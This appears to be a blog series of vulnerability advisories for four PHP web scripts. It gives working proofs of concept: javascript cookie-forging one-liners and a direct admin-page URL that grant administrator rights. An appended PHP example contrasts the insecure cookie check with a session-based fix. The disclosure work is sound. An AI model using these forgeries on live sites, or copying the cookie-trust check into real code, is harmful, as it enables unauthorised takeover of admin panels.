

Star Article Vulnerability

Star Article is a “Ready to use article, news, joke, tutorial site script with more features than you can think of”. Insecure cookie handling leads to full administration rights on the CMS admin panel: the application trusts the cookie below as proof that the visitor is the administrator.

Name – admin_user
Content – admin
Path – /

Proof of Concept:

javascript:document.cookie="admin_user=admin; path=/"

Vendor was contacted three times over a 30 day period and did not respond to any of the emails.

The full advisory can be found Here.

PHP SiteLock Vulnerability

PHP Site Lock is a highly secure website (Ed: haha) login script which has features like User Authentication & Management, Website Password Protection, and protection of PDFs, images, etc. The vulnerability leads to full administration rights on the admin panel: setting the three cookies below is enough to be treated as the administrator.

Proof of Concept:

javascript:document.cookie="user_type=admin; path=/"
javascript:document.cookie="login_name=admin; path=/"
javascript:document.cookie="login_id=0; path=/"

Vendor was contacted three times over a 30 day period and did not respond to any of the emails.

The full advisory can be found Here.

Million Dollar Text Links Vulnerability

Next up is Million Dollar Text Links, which is a link exchange application. There are no authentication checks on the admin home page, so anyone can simply browse to the admin control panel and bypass the login procedure. This gives full access to the admin panel.

Proof of Concept:

http://sitename[applicationpath]/admin.home.php

Vendor was contacted twice over a 30 day period and did not respond to any of the emails.

The full advisory can be found Here.

Arcade Script Vulnerability

I have found a few vulnerabilities over the last few months which I will be posting here over the next few days. In all cases I have tried to contact the application developer and have included any information regarding this in the advisory. Most of them have been cookie related vulnerabilities.

First up is Arcade Trade Script v1.0. Insecure cookie handling allows anyone to simply create a custom cookie with the values below. This will allow full access to the admin panel of the ATS application.

Name – adminLoggedIn
Content – true
Path – /

You can create the cookie by running the following:

javascript:document.cookie="adminLoggedIn=true; path=/"

The full advisory can be found Here.
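The cookie problems above share one root cause: the script reads a client-controlled cookie and treats its value as proof of authentication, so anyone can set it. The following is an added illustration, not code from Arcade Trade Script or any other application named here; the vulnerable check is an assumed shape of such scripts, using the `adminLoggedIn` cookie name from this advisory, and the hardened version keeps the admin flag server-side in the session instead.

```php
<?php
// Added illustration of the cookie-trust flaw behind the advisories on this page.
// Not code from any of the scripts named here; the cookie name adminLoggedIn is
// the one from the Arcade Trade Script advisory, and the admin record is constructed.

// VULNERABLE pattern (assumed shape of the affected scripts): a client-supplied
// cookie is taken as proof of authentication. The client chooses the value, so
// the check proves nothing.
function isAdminInsecure(array $cookie): bool
{
    return isset($cookie['adminLoggedIn']) && $cookie['adminLoggedIn'] === 'true';
}

// HARDENED pattern: the only client-held value is the opaque session id; the admin
// flag lives server-side in the session and is set only after a password check.
// $session stands in for $_SESSION so the logic can be exercised without a web server.
function loginAdmin(string $user, string $password, array $adminRecord, array &$session): bool
{
    if ($user !== $adminRecord['name'] || !password_verify($password, $adminRecord['hash'])) {
        return false;
    }
    // Issue a fresh session id when privilege changes to defeat session fixation.
    if (session_status() === PHP_SESSION_ACTIVE) {
        session_regenerate_id(true);
    }
    $session['is_admin'] = true;
    return true;
}

function isAdminSecure(array $session): bool
{
    // Only the server ever writes is_admin; a forged cookie cannot influence it.
    return !empty($session['is_admin']);
}

// Constructed demonstration with a made-up credential (no real account).
$adminRecord = ['name' => 'admin', 'hash' => password_hash('constructed-demo-password', PASSWORD_DEFAULT)];

$forgedCookie = ['adminLoggedIn' => 'true'];   // exactly what the PoC above sets
var_dump(isAdminInsecure($forgedCookie));      // the forged cookie passes the insecure check

$session = [];
var_dump(isAdminSecure($session));             // nobody is logged in yet
var_dump(loginAdmin('admin', 'wrong-password', $adminRecord, $session));
var_dump(isAdminSecure($session));             // still not admin after a failed login
var_dump(loginAdmin('admin', 'constructed-demo-password', $adminRecord, $session));
var_dump(isAdminSecure($session));             // admin only after the password verified
```

In a real deployment the session cookie itself should also be issued with the HttpOnly, Secure and SameSite attributes via session_set_cookie_params() before session_start().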